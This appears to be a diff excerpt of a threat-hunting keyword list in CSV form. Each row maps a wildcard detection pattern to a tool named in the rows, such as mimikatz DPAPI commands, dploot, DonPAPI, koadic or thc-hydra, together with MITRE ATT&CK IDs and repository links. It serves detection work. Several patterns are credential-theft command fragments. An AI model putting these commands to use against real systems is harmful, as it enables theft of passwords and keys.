+"*DownloadFileImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*Downloading */*.tar to /tmp/*.pak*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z"
+"*downloadMalwareDomains*","offensive_tool_keyword","domainhunter","Checks expired domains for 
categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z"
+"*downloads/wapiti-code*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
+"*DownloadString*https://checkip.amazonaws.com*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z"
+"*dpapi.py backupkeys -t */*@*","greyware_tool_keyword","dpapi.py","the command is used to extract the Data Protection API (DPAPI) backup keys from a target system. DPAPI is a Windows API that provides data protection services to secure sensitive data. such as private keys. passwords. and other secrets. By obtaining the DPAPI backup keys. an attacker can potentially decrypt sensitive data stored on the target system or impersonate users. 
gaining unauthorized access to other systems and resources.","T1552.006","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*dpapi.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*dpapi/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*dpapi::blob*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::chrome*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cloudapkd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cloudapreg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::create*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::credhist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::luna*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::masterkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::protect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::ps*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::rdg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::ssh*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::tpm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::vault*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::wifi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::wwman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*dpapi_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*dpapi_pick/credhist.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*DPAPImk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*dpl4hydra 
*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra.sh*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_*.csv*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_*.tmp*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_linksys*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dploot -*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*backupkey*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - 
TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*browser*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*certificates*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*credentials*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*machinecertificates*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*machinecredentials*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*machinemasterkeys*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" 
+"*dploot*machinevaults*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*masterkeys*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*vaults*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot*wifi*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot_linux_adm64*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dploot-main.zip*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*dpplabbmogkhghncfbfdeeokoefdjegm*","greyware_tool_keyword","Proxy SwitchySharp","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
